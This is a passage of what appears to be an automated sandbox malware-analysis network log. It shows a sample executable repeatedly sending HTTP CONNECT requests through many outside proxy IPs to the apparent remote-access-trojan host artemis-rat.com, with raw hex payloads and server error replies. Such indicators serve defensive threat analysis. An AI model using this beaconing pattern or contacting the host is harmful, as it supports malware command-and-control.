                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.238518000 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1748192.168.2.5548128.209.255.1331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.903341055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592694998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.879235983 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1749192.168.2.554935104.21.85.200803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.903636932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.058139086 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1750192.168.2.55487051.79.87.14485333876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.903640985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1751192.168.2.554835167.172.159.43228473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.907398939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1752192.168.2.55381698.170.57.23141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.912144899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1753192.168.2.55477145.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.912486076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1754192.168.2.554778185.132.242.21280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.912826061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1755192.168.2.554939162.159.242.150803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.913393021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.075656891 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1756192.168.2.554195142.54.229.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.913799047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1757192.168.2.554775103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.914020061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1758192.168.2.55462441.77.188.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.914716959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.351676941 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Content-Length: 597
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was una
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.391032934 CET372INData Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20
                                                                                                                                                                                                                                                            Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.767410994 CET372INData Raw: 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20
                                                                                                                                                                                                                                                            Data Ascii: ble to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this erro


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1759192.168.2.55469147.104.0.1290903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.914796114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702018023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.112988949 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1760192.168.2.554898194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.915045977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1761192.168.2.554807196.1.95.124803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.915334940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701858997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905371904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092897892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389569044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.708441973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.093468904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1762192.168.2.55489923.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.916049004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1763192.168.2.554790116.106.105.5510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.920559883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1764192.168.2.55406834.93.157.87218023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.921019077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.998749971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092732906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.092895031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1765192.168.2.554921162.241.158.204446073876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.939358950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592438936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
